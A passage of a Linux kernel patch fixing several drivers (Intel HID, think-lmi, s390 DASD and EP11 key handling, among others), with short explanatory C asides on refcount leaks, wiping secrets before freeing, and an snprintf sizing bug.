+-				elements[ATTR_NAME].string.pointer);
++		duplicate = kset_find_obj(tmp_set, elements[ATTR_NAME].string.pointer);
++		if (duplicate) {
++			pr_debug("Duplicate attribute name found - %s\n",
++				 elements[ATTR_NAME].string.pointer);
++			kobject_put(duplicate);
+ 			goto nextobj;
+ 		}
+ 
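
[Illustrative aside, not part of the patch] The dell-wmi-sysman hunk matters because kset_find_obj() returns the matched kobject with its reference count raised; discarding the result, as the old code did, leaked a reference on every duplicate. A generic sketch of the lookup-returns-a-reference contract (obj, obj_get and obj_put are illustrative, not kernel API):

#include <stdio.h>
#include <string.h>

struct obj { const char *name; int refcount; };

static struct obj *obj_get(struct obj *o) { o->refcount++; return o; }

static void obj_put(struct obj *o)
{
    if (--o->refcount == 0)
        printf("%s: last reference dropped\n", o->name);
}

/* Like kset_find_obj(): a successful lookup hands the caller a reference. */
static struct obj *find_obj(struct obj *set[], int n, const char *name)
{
    for (int i = 0; i < n; i++)
        if (!strcmp(set[i]->name, name))
            return obj_get(set[i]);
    return NULL;
}

int main(void)
{
    struct obj a = { "attr", 1 };
    struct obj *set[] = { &a };

    struct obj *dup = find_obj(set, 1, "attr");
    if (dup) {
        printf("duplicate found, refcount=%d\n", dup->refcount); /* 2 */
        obj_put(dup);    /* without this, the reference leaks */
    }
    printf("refcount=%d\n", a.refcount);                         /* back to 1 */
    return 0;
}
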
+diff --git a/drivers/platform/x86/huawei-wmi.c b/drivers/platform/x86/huawei-wmi.c
+index b85050e4a0d65..ae5daecff1771 100644
+--- a/drivers/platform/x86/huawei-wmi.c
++++ b/drivers/platform/x86/huawei-wmi.c
+@@ -86,6 +86,8 @@ static const struct key_entry huawei_wmi_keymap[] = {
+ 	{ KE_IGNORE, 0x293, { KEY_KBDILLUMTOGGLE } },
+ 	{ KE_IGNORE, 0x294, { KEY_KBDILLUMUP } },
+ 	{ KE_IGNORE, 0x295, { KEY_KBDILLUMUP } },
++	// Ignore Ambient Light Sensoring
++	{ KE_KEY,    0x2c1, { KEY_RESERVED } },
+ 	{ KE_END,	 0 }
+ };
+ 
+diff --git a/drivers/platform/x86/intel/hid.c b/drivers/platform/x86/intel/hid.c
+index b6313ecd190c0..b96ef0eb82aff 100644
+--- a/drivers/platform/x86/intel/hid.c
++++ b/drivers/platform/x86/intel/hid.c
+@@ -131,6 +131,12 @@ static const struct dmi_system_id dmi_vgbs_allow_list[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Surface Go"),
+ 		},
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP Elite Dragonfly G2 Notebook PC"),
++		},
++	},
+ 	{ }
+ };
+ 
+@@ -601,7 +607,7 @@ static bool button_array_present(struct platform_device *device)
+ static int intel_hid_probe(struct platform_device *device)
+ {
+ 	acpi_handle handle = ACPI_HANDLE(&device->dev);
+-	unsigned long long mode;
++	unsigned long long mode, dummy;
+ 	struct intel_hid_priv *priv;
+ 	acpi_status status;
+ 	int err;
+@@ -666,18 +672,15 @@ static int intel_hid_probe(struct platform_device *device)
+ 	if (err)
+ 		goto err_remove_notify;
+ 
+-	if (priv->array) {
+-		unsigned long long dummy;
++	intel_button_array_enable(&device->dev, true);
+ 
+-		intel_button_array_enable(&device->dev, true);
+-
+-		/* Call button load method to enable HID power button */
+-		if (!intel_hid_evaluate_method(handle, INTEL_HID_DSM_BTNL_FN,
+-					       &dummy)) {
+-			dev_warn(&device->dev,
+-				 "failed to enable HID power button\n");
+-		}
+-	}
++	/*
++	 * Call button load method to enable HID power button
++	 * Always do this since it activates events on some devices without
++	 * a button array too.
++	 */
++	if (!intel_hid_evaluate_method(handle, INTEL_HID_DSM_BTNL_FN, &dummy))
++		dev_warn(&device->dev, "failed to enable HID power button\n");
+ 
+ 	device_init_wakeup(&device->dev, true);
+ 	/*
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 3cbb92b6c5215..f6290221d139d 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -719,12 +719,12 @@ static ssize_t cert_to_password_store(struct kobject *kobj,
+ 	/* Format: 'Password,Signature' */
+ 	auth_str = kasprintf(GFP_KERNEL, "%s,%s", passwd, setting->signature);
+ 	if (!auth_str) {
+-		kfree(passwd);
++		kfree_sensitive(passwd);
+ 		return -ENOMEM;
+ 	}
+ 	ret = tlmi_simple_call(LENOVO_CERT_TO_PASSWORD_GUID, auth_str);
+ 	kfree(auth_str);
+-	kfree(passwd);
++	kfree_sensitive(passwd);
+ 
+ 	return ret ?: count;
+ }
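
[Illustrative aside, not part of the patch] think-lmi.c switches the password buffer from kfree() to kfree_sensitive(), which zeroes the memory before returning it to the allocator so the secret does not linger on the freed heap. A user-space analogue, assuming glibc's explicit_bzero() is available; unlike kfree_sensitive(), the caller here must supply the length:

#define _DEFAULT_SOURCE
#include <stdlib.h>
#include <string.h>

/* Wipe-then-free: explicit_bzero() is not elided by the optimizer the way
 * a plain memset() right before free() may be. */
static void free_sensitive(void *p, size_t len)
{
    if (!p)
        return;
    explicit_bzero(p, len);
    free(p);
}

int main(void)
{
    char *passwd = strdup("hunter2");
    size_t len = strlen(passwd);

    /* ... use passwd ... */
    free_sensitive(passwd, len);
    return 0;
}
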
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 67e7664efb0dc..cb8f65c1d4e3b 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -224,6 +224,10 @@ static struct glink_channel *qcom_glink_alloc_channel(struct qcom_glink *glink,
+ 
+ 	channel->glink = glink;
+ 	channel->name = kstrdup(name, GFP_KERNEL);
++	if (!channel->name) {
++		kfree(channel);
++		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	init_completion(&channel->open_req);
+ 	init_completion(&channel->open_ack);
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index bce3422d85640..04d9b1d4b1ba9 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -2926,41 +2926,32 @@ static void _dasd_wake_block_flush_cb(struct dasd_ccw_req *cqr, void *data)
+  * Requeue a request back to the block request queue
+  * only works for block requests
+  */
+-static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
++static void _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ {
+-	struct dasd_block *block = cqr->block;
+ 	struct request *req;
+ 
+-	if (!block)
+-		return -EINVAL;
+ 	/*
+ 	 * If the request is an ERP request there is nothing to requeue.
+ 	 * This will be done with the remaining original request.
+ 	 */
+ 	if (cqr->refers)
+-		return 0;
++		return;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+ 	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+-	return 0;
++	return;
+ }
+ 
+-/*
+- * Go through all request on the dasd_block request queue, cancel them
+- * on the respective dasd_device, and return them to the generic
+- * block layer.
+- */
+-static int dasd_flush_block_queue(struct dasd_block *block)
++static int _dasd_requests_to_flushqueue(struct dasd_block *block,
++					struct list_head *flush_queue)
+ {
+ 	struct dasd_ccw_req *cqr, *n;
+-	int rc, i;
+-	struct list_head flush_queue;
+ 	unsigned long flags;
++	int rc, i;
+ 
+-	INIT_LIST_HEAD(&flush_queue);
+-	spin_lock_bh(&block->queue_lock);
++	spin_lock_irqsave(&block->queue_lock, flags);
+ 	rc = 0;
+ restart:
+ 	list_for_each_entry_safe(cqr, n, &block->ccw_queue, blocklist) {
+@@ -2975,13 +2966,32 @@ restart:
+ 		 * is returned from the dasd_device layer.
+ 		 */
+ 		cqr->callback = _dasd_wake_block_flush_cb;
+-		for (i = 0; cqr != NULL; cqr = cqr->refers, i++)
+-			list_move_tail(&cqr->blocklist, &flush_queue);
++		for (i = 0; cqr; cqr = cqr->refers, i++)
++			list_move_tail(&cqr->blocklist, flush_queue);
+ 		if (i > 1)
+ 			/* moved more than one request - need to restart */
+ 			goto restart;
+ 	}
+-	spin_unlock_bh(&block->queue_lock);
++	spin_unlock_irqrestore(&block->queue_lock, flags);
++
++	return rc;
++}
++
++/*
++ * Go through all request on the dasd_block request queue, cancel them
++ * on the respective dasd_device, and return them to the generic
++ * block layer.
++ */
++static int dasd_flush_block_queue(struct dasd_block *block)
++{
++	struct dasd_ccw_req *cqr, *n;
++	struct list_head flush_queue;
++	unsigned long flags;
++	int rc;
++
++	INIT_LIST_HEAD(&flush_queue);
++	rc = _dasd_requests_to_flushqueue(block, &flush_queue);
++
+ 	/* Now call the callback function of flushed requests */
+ restart_cb:
+ 	list_for_each_entry_safe(cqr, n, &flush_queue, blocklist) {
+@@ -3864,75 +3874,36 @@ EXPORT_SYMBOL_GPL(dasd_generic_space_avail);
+  */
+ int dasd_generic_requeue_all_requests(struct dasd_device *device)
+ {
++	struct dasd_block *block = device->block;
+ 	struct list_head requeue_queue;
+ 	struct dasd_ccw_req *cqr, *n;
+-	struct dasd_ccw_req *refers;
+ 	int rc;
+ 
+-	INIT_LIST_HEAD(&requeue_queue);
+-	spin_lock_irq(get_ccwdev_lock(device->cdev));
+-	rc = 0;
+-	list_for_each_entry_safe(cqr, n, &device->ccw_queue, devlist) {
+-		/* Check status and move request to flush_queue */
+-		if (cqr->status == DASD_CQR_IN_IO) {
+-			rc = device->discipline->term_IO(cqr);
+-			if (rc) {
+-				/* unable to terminate requeust */
+-				dev_err(&device->cdev->dev,
+-					"Unable to terminate request %p "
+-					"on suspend\n", cqr);
+-				spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-				dasd_put_device(device);
+-				return rc;
+-			}
+-		}
+-		list_move_tail(&cqr->devlist, &requeue_queue);
+-	}
+-	spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-
+-	list_for_each_entry_safe(cqr, n, &requeue_queue, devlist) {
+-		wait_event(dasd_flush_wq,
+-			   (cqr->status != DASD_CQR_CLEAR_PENDING));
++	if (!block)
++		return 0;
+ 
+-		/*
+-		 * requeue requests to blocklayer will only work
+-		 * for block device requests
+-		 */
+-		if (_dasd_requeue_request(cqr))
+-			continue;
++	INIT_LIST_HEAD(&requeue_queue);
++	rc = _dasd_requests_to_flushqueue(block, &requeue_queue);
+ 
+-		/* remove requests from device and block queue */
+-		list_del_init(&cqr->devlist);
+-		while (cqr->refers != NULL) {
+-			refers = cqr->refers;
+-			/* remove the request from the block queue */
+-			list_del(&cqr->blocklist);
+-			/* free the finished erp request */
+-			dasd_free_erp_request(cqr, cqr->memdev);
+-			cqr = refers;
++	/* Now call the callback function of flushed requests */
++restart_cb:
++	list_for_each_entry_safe(cqr, n, &requeue_queue, blocklist) {
++		wait_event(dasd_flush_wq, (cqr->status < DASD_CQR_QUEUED));
++		/* Process finished ERP request. */
++		if (cqr->refers) {
++			spin_lock_bh(&block->queue_lock);
++			__dasd_process_erp(block->base, cqr);
++			spin_unlock_bh(&block->queue_lock);
++			/* restart list_for_xx loop since dasd_process_erp
++			 * might remove multiple elements
++			 */
++			goto restart_cb;
+ 		}
+-
+-		/*
+-		 * _dasd_requeue_request already checked for a valid
+-		 * blockdevice, no need to check again
+-		 * all erp requests (cqr->refers) have a cqr->block
+-		 * pointer copy from the original cqr
+-		 */
++		_dasd_requeue_request(cqr);
+ 		list_del_init(&cqr->blocklist);
+ 		cqr->block->base->discipline->free_cp(
+ 			cqr, (struct request *) cqr->callback_data);
+ 	}
+-
+-	/*
+-	 * if requests remain then they are internal request
+-	 * and go back to the device queue
+-	 */
+-	if (!list_empty(&requeue_queue)) {
+-		/* move freeze_queue to start of the ccw_queue */
+-		spin_lock_irq(get_ccwdev_lock(device->cdev));
+-		list_splice_tail(&requeue_queue, &device->ccw_queue);
+-		spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-	}
+ 	dasd_schedule_device_bh(device);
+ 	return rc;
+ }
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index d030fe2e29643..91cb9d52a4250 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -2441,7 +2441,7 @@ static struct dasd_ccw_req *dasd_3990_erp_add_erp(struct dasd_ccw_req *cqr)
+ 	erp->block    = cqr->block;
+ 	erp->magic    = cqr->magic;
+ 	erp->expires  = cqr->expires;
+-	erp->retries  = 256;
++	erp->retries  = device->default_retries;
+ 	erp->buildclk = get_tod_clock();
+ 	erp->status = DASD_CQR_FILLED;
+ 
+diff --git a/drivers/s390/block/dasd_devmap.c b/drivers/s390/block/dasd_devmap.c
+index df17f0f9cb0fc..b2a4c34330573 100644
+--- a/drivers/s390/block/dasd_devmap.c
++++ b/drivers/s390/block/dasd_devmap.c
+@@ -1377,16 +1377,12 @@ static ssize_t dasd_vendor_show(struct device *dev,
+ 
+ static DEVICE_ATTR(vendor, 0444, dasd_vendor_show, NULL);
+ 
+-#define UID_STRLEN ( /* vendor */ 3 + 1 + /* serial    */ 14 + 1 +\
+-		     /* SSID   */ 4 + 1 + /* unit addr */ 2 + 1 +\
+-		     /* vduit */ 32 + 1)
+-
+ static ssize_t
+ dasd_uid_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
++	char uid_string[DASD_UID_STRLEN];
+ 	struct dasd_device *device;
+ 	struct dasd_uid uid;
+-	char uid_string[UID_STRLEN];
+ 	char ua_string[3];
+ 
+ 	device = dasd_device_from_cdev(to_ccwdev(dev));
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 792e5d245bc38..c5619751a0658 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -1079,12 +1079,12 @@ static void dasd_eckd_get_uid_string(struct dasd_conf *conf,
+ 
+ 	create_uid(conf, &uid);
+ 	if (strlen(uid.vduit) > 0)
+-		snprintf(print_uid, sizeof(*print_uid),
++		snprintf(print_uid, DASD_UID_STRLEN,
+ 			 "%s.%s.%04x.%02x.%s",
+ 			 uid.vendor, uid.serial, uid.ssid,
+ 			 uid.real_unit_addr, uid.vduit);
+ 	else
+-		snprintf(print_uid, sizeof(*print_uid),
++		snprintf(print_uid, DASD_UID_STRLEN,
+ 			 "%s.%s.%04x.%02x",
+ 			 uid.vendor, uid.serial, uid.ssid,
+ 			 uid.real_unit_addr);
+@@ -1093,8 +1093,8 @@ static void dasd_eckd_get_uid_string(struct dasd_conf *conf,
+ static int dasd_eckd_check_cabling(struct dasd_device *device,
+ 				   void *conf_data, __u8 lpm)
+ {
++	char print_path_uid[DASD_UID_STRLEN], print_device_uid[DASD_UID_STRLEN];
+ 	struct dasd_eckd_private *private = device->private;
+-	char print_path_uid[60], print_device_uid[60];
+ 	struct dasd_conf path_conf;
+ 
+ 	path_conf.data = conf_data;
+@@ -1293,9 +1293,9 @@ static void dasd_eckd_path_available_action(struct dasd_device *device,
+ 	__u8 path_rcd_buf[DASD_ECKD_RCD_DATA_SIZE];
+ 	__u8 lpm, opm, npm, ppm, epm, hpfpm, cablepm;
+ 	struct dasd_conf_data *conf_data;
++	char print_uid[DASD_UID_STRLEN];
+ 	struct dasd_conf path_conf;
+ 	unsigned long flags;
+-	char print_uid[60];
+ 	int rc, pos;
+ 
+ 	opm = 0;
+@@ -5856,8 +5856,8 @@ static void dasd_eckd_dump_sense(struct dasd_device *device,
+ static int dasd_eckd_reload_device(struct dasd_device *device)
+ {
+ 	struct dasd_eckd_private *private = device->private;
++	char print_uid[DASD_UID_STRLEN];
+ 	int rc, old_base;
+-	char print_uid[60];
+ 	struct dasd_uid uid;
+ 	unsigned long flags;
+ 
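
[Illustrative aside, not part of the patch] The dasd_eckd.c hunks fix a classic snprintf() sizing bug: print_uid is evidently a char pointer in dasd_eckd_get_uid_string(), so sizeof(*print_uid) is 1 and the old calls could emit nothing but the terminating NUL; the new code passes the real buffer bound DASD_UID_STRLEN. The pitfall in miniature (UID_STRLEN is a stand-in value):

#include <stdio.h>

#define UID_STRLEN 61    /* hypothetical bound, like DASD_UID_STRLEN */

static void fill_uid(char *print_uid)
{
    /* BUG: print_uid is a pointer, so sizeof(*print_uid) == 1; snprintf
     * is told the buffer holds one byte and writes only "\0". */
    snprintf(print_uid, sizeof(*print_uid), "%s.%04x", "IBM", 0x1234);
}

static void fill_uid_fixed(char *print_uid)
{
    snprintf(print_uid, UID_STRLEN, "%s.%04x", "IBM", 0x1234);
}

int main(void)
{
    char buf[UID_STRLEN];

    fill_uid(buf);
    printf("buggy: \"%s\"\n", buf);    /* "" */
    fill_uid_fixed(buf);
    printf("fixed: \"%s\"\n", buf);    /* "IBM.1234" */
    return 0;
}
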
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index 97adc8a7ae6b1..f50932518f83a 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -259,6 +259,10 @@ struct dasd_uid {
+ 	char vduit[33];
+ };
+ 
++#define DASD_UID_STRLEN ( /* vendor */ 3 + 1 + /* serial    */ 14 + 1 +	\
++			  /* SSID   */ 4 + 1 + /* unit addr */ 2 + 1 +	\
++			  /* vduit */ 32 + 1)
++
+ /*
+  * PPRC Status data
+  */
+diff --git a/drivers/s390/block/dcssblk.c b/drivers/s390/block/dcssblk.c
+index c0f85ffb2b62d..735ee0ca4a13b 100644
+--- a/drivers/s390/block/dcssblk.c
++++ b/drivers/s390/block/dcssblk.c
+@@ -411,6 +411,7 @@ removeseg:
+ 	}
+ 	list_del(&dev_info->lh);
+ 
++	dax_remove_host(dev_info->gd);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ 	del_gendisk(dev_info->gd);
+@@ -706,9 +707,9 @@ dcssblk_add_store(struct device *dev, struct device_attribute *attr, const char
+ 	goto out;
+ 
+ out_dax_host:
++	put_device(&dev_info->dev);
+ 	dax_remove_host(dev_info->gd);
+ out_dax:
+-	put_device(&dev_info->dev);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ put_dev:
+@@ -788,6 +789,7 @@ dcssblk_remove_store(struct device *dev, struct device_attribute *attr, const ch
+ 	}
+ 
+ 	list_del(&dev_info->lh);
++	dax_remove_host(dev_info->gd);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ 	del_gendisk(dev_info->gd);
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index a8def50c149bd..2b92ec20ed68e 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -565,6 +565,11 @@ static int pkey_genseckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 		if (*keybufsize < MINEP11AESKEYBLOBSIZE)
+ 			return -EINVAL;
+ 		break;
++	case PKEY_TYPE_EP11_AES:
++		if (*keybufsize < (sizeof(struct ep11kblob_header) +
++				   MINEP11AESKEYBLOBSIZE))
++			return -EINVAL;
++		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+@@ -581,9 +586,10 @@ static int pkey_genseckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
+ 		card = apqns[i].card;
+ 		dom = apqns[i].domain;
+-		if (ktype == PKEY_TYPE_EP11) {
++		if (ktype == PKEY_TYPE_EP11 ||
++		    ktype == PKEY_TYPE_EP11_AES) {
+ 			rc = ep11_genaeskey(card, dom, ksize, kflags,
+-					    keybuf, keybufsize);
++					    keybuf, keybufsize, ktype);
+ 		} else if (ktype == PKEY_TYPE_CCA_DATA) {
+ 			rc = cca_genseckey(card, dom, ksize, keybuf);
+ 			*keybufsize = (rc ? 0 : SECKEYBLOBSIZE);
+@@ -747,7 +753,7 @@ static int pkey_verifykey2(const u8 *key, size_t keylen,
+ 		if (ktype)
+ 			*ktype = PKEY_TYPE_EP11;
+ 		if (ksize)
+-			*ksize = kb->head.keybitlen;
++			*ksize = kb->head.bitlen;
+ 
+ 		rc = ep11_findcard2(&_apqns, &_nr_apqns, *cardnr, *domain,
+ 				    ZCRYPT_CEX7, EP11_API_V, kb->wkvp);
+@@ -1313,7 +1319,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		apqns = _copy_apqns_from_user(kgs.apqns, kgs.apqn_entries);
+ 		if (IS_ERR(apqns))
+ 			return PTR_ERR(apqns);
+-		kkey = kmalloc(klen, GFP_KERNEL);
++		kkey = kzalloc(klen, GFP_KERNEL);
+ 		if (!kkey) {
+ 			kfree(apqns);
+ 			return -ENOMEM;
+@@ -1941,7 +1947,7 @@ static struct attribute_group ccacipher_attr_group = {
+  * (i.e. off != 0 or count < key blob size) -EINVAL is returned.
+  * This function and the sysfs attributes using it provide EP11 key blobs
+  * padded to the upper limit of MAXEP11AESKEYBLOBSIZE which is currently
+- * 320 bytes.
++ * 336 bytes.
+  */
+ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 				       bool is_xts, char *buf, loff_t off,
+@@ -1969,7 +1975,8 @@ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
+ 		card = apqns[i] >> 16;
+ 		dom = apqns[i] & 0xFFFF;
+-		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize);
++		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize,
++				    PKEY_TYPE_EP11_AES);
+ 		if (rc == 0)
+ 			break;
+ 	}
+@@ -1979,7 +1986,8 @@ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 	if (is_xts) {
+ 		keysize = MAXEP11AESKEYBLOBSIZE;
+ 		buf += MAXEP11AESKEYBLOBSIZE;
+-		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize);
++		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize,
++				    PKEY_TYPE_EP11_AES);
+ 		if (rc == 0)
+ 			return 2 * MAXEP11AESKEYBLOBSIZE;
+ 	}
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.c b/drivers/s390/crypto/zcrypt_ep11misc.c
+index b1c29017be5bc..20bbeec1a1a22 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.c
++++ b/drivers/s390/crypto/zcrypt_ep11misc.c
+@@ -113,6 +113,50 @@ static void __exit card_cache_free(void)
+ 	spin_unlock_bh(&card_list_lock);
+ }
+ 
++static int ep11_kb_split(const u8 *kb, size_t kblen, u32 kbver,
++			 struct ep11kblob_header **kbhdr, size_t *kbhdrsize,
++			 u8 **kbpl, size_t *kbplsize)
++{
++	struct ep11kblob_header *hdr = NULL;
++	size_t hdrsize, plsize = 0;
++	int rc = -EINVAL;
++	u8 *pl = NULL;
++
++	if (kblen < sizeof(struct ep11kblob_header))
++		goto out;
++	hdr = (struct ep11kblob_header *)kb;
++
++	switch (kbver) {
++	case TOKVER_EP11_AES:
++		/* header overlays the payload */
++		hdrsize = 0;
++		break;
++	case TOKVER_EP11_ECC_WITH_HEADER:
++	case TOKVER_EP11_AES_WITH_HEADER:
++		/* payload starts after the header */
++		hdrsize = sizeof(struct ep11kblob_header);
++		break;
++	default:
++		goto out;
++	}
++
++	plsize = kblen - hdrsize;
++	pl = (u8 *)kb + hdrsize;
++
++	if (kbhdr)
++		*kbhdr = hdr;
++	if (kbhdrsize)
++		*kbhdrsize = hdrsize;
++	if (kbpl)
++		*kbpl = pl;
++	if (kbplsize)
++		*kbplsize = plsize;
++
++	rc = 0;
++out:
++	return rc;
++}
++
+ /*
+  * Simple check if the key blob is a valid EP11 AES key blob with header.
+  */
+@@ -664,8 +708,9 @@ EXPORT_SYMBOL(ep11_get_domain_info);
+  */
+ #define KEY_ATTR_DEFAULTS 0x00200c00
+ 
+-int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		   u8 *keybuf, size_t *keybufsize)
++static int _ep11_genaeskey(u16 card, u16 domain,
++			   u32 keybitsize, u32 keygenflags,
++			   u8 *keybuf, size_t *keybufsize)
+ {
+ 	struct keygen_req_pl {
+ 		struct pl_head head;
+@@ -701,7 +746,6 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	struct ep11_cprb *req = NULL, *rep = NULL;
+ 	struct ep11_target_dev target;
+ 	struct ep11_urb *urb = NULL;
+-	struct ep11keyblob *kb;
+ 	int api, rc = -ENOMEM;
+ 
+ 	switch (keybitsize) {
+@@ -780,14 +824,9 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 		goto out;
+ 	}
+ 
+-	/* copy key blob and set header values */
++	/* copy key blob */
+ 	memcpy(keybuf, rep_pl->data, rep_pl->data_len);
+ 	*keybufsize = rep_pl->data_len;
+-	kb = (struct ep11keyblob *)keybuf;
+-	kb->head.type = TOKTYPE_NON_CCA;
+-	kb->head.len = rep_pl->data_len;
+-	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.keybitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -795,6 +834,43 @@ out:
+ 	kfree(urb);
+ 	return rc;
+ }
++
++int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
++		   u8 *keybuf, size_t *keybufsize, u32 keybufver)
++{
++	struct ep11kblob_header *hdr;
++	size_t hdr_size, pl_size;
++	u8 *pl;
++	int rc;
++
++	switch (keybufver) {
++	case TOKVER_EP11_AES:
++	case TOKVER_EP11_AES_WITH_HEADER:
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	rc = ep11_kb_split(keybuf, *keybufsize, keybufver,
++			   &hdr, &hdr_size, &pl, &pl_size);
++	if (rc)
++		return rc;
++
++	rc = _ep11_genaeskey(card, domain, keybitsize, keygenflags,
++			     pl, &pl_size);
++	if (rc)
++		return rc;
++
++	*keybufsize = hdr_size + pl_size;
++
++	/* update header information */
++	hdr->type = TOKTYPE_NON_CCA;
++	hdr->len = *keybufsize;
++	hdr->version = keybufver;
++	hdr->bitlen = keybitsize;
++
++	return 0;
++}
+ EXPORT_SYMBOL(ep11_genaeskey);
+ 
+ static int ep11_cryptsingle(u16 card, u16 domain,
+@@ -1055,7 +1131,7 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 	kb->head.type = TOKTYPE_NON_CCA;
+ 	kb->head.len = rep_pl->data_len;
+ 	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.keybitlen = keybitsize;
++	kb->head.bitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -1201,7 +1277,6 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize)
+ {
+ 	int rc;
+-	struct ep11keyblob *kb;
+ 	u8 encbuf[64], *kek = NULL;
+ 	size_t clrkeylen, keklen, encbuflen = sizeof(encbuf);
+ 
+@@ -1223,17 +1298,15 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	}
+ 
+ 	/* Step 1: generate AES 256 bit random kek key */
+-	rc = ep11_genaeskey(card, domain, 256,
+-			    0x00006c00, /* EN/DECRYPT, WRAP/UNWRAP */
+-			    kek, &keklen);
++	rc = _ep11_genaeskey(card, domain, 256,
++			     0x00006c00, /* EN/DECRYPT, WRAP/UNWRAP */
++			     kek, &keklen);
+ 	if (rc) {
+ 		DEBUG_ERR(
+ 			"%s generate kek key failed, rc=%d\n",
+ 			__func__, rc);
+ 		goto out;
+ 	}
+-	kb = (struct ep11keyblob *)kek;
+-	memset(&kb->head, 0, sizeof(kb->head));
+ 
+ 	/* Step 2: encrypt clear key value with the kek key */
+ 	rc = ep11_cryptsingle(card, domain, 0, 0, def_iv, kek, keklen,
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.h b/drivers/s390/crypto/zcrypt_ep11misc.h
+index 07445041869fe..ed328c354bade 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.h
++++ b/drivers/s390/crypto/zcrypt_ep11misc.h
+@@ -29,14 +29,7 @@ struct ep11keyblob {
+ 	union {
+ 		u8 session[32];
+ 		/* only used for PKEY_TYPE_EP11: */
+-		struct {
+-			u8  type;      /* 0x00 (TOKTYPE_NON_CCA) */
+-			u8  res0;      /* unused */
+-			u16 len;       /* total length in bytes of this blob */
+-			u8  version;   /* 0x03 (TOKVER_EP11_AES) */
+-			u8  res1;      /* unused */
+-			u16 keybitlen; /* clear key bit len, 0 for unknown */
+-		} head;
++		struct ep11kblob_header head;
+ 	};
+ 	u8  wkvp[16];  /* wrapping key verification pattern */
+ 	u64 attr;      /* boolean key attributes */
+@@ -114,7 +107,7 @@ int ep11_get_domain_info(u16 card, u16 domain, struct ep11_domain_info *info);
+  * Generate (random) EP11 AES secure key.
+  */
+ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		   u8 *keybuf, size_t *keybufsize);
++		   u8 *keybuf, size_t *keybufsize, u32 keybufver);
+ 
+ /*
+  * Generate EP11 AES secure key with given clear key value.
+diff --git a/drivers/scsi/aacraid/aacraid.h b/drivers/scsi/aacraid/aacraid.h
+index 5e115e8b2ba46..7c6efde75da66 100644
+--- a/drivers/scsi/aacraid/aacraid.h
++++ b/drivers/scsi/aacraid/aacraid.h
+@@ -1678,6 +1678,7 @@ struct aac_dev
+ 	u32			handle_pci_error;
+ 	bool			init_reset;
+ 	u8			soft_reset_support;
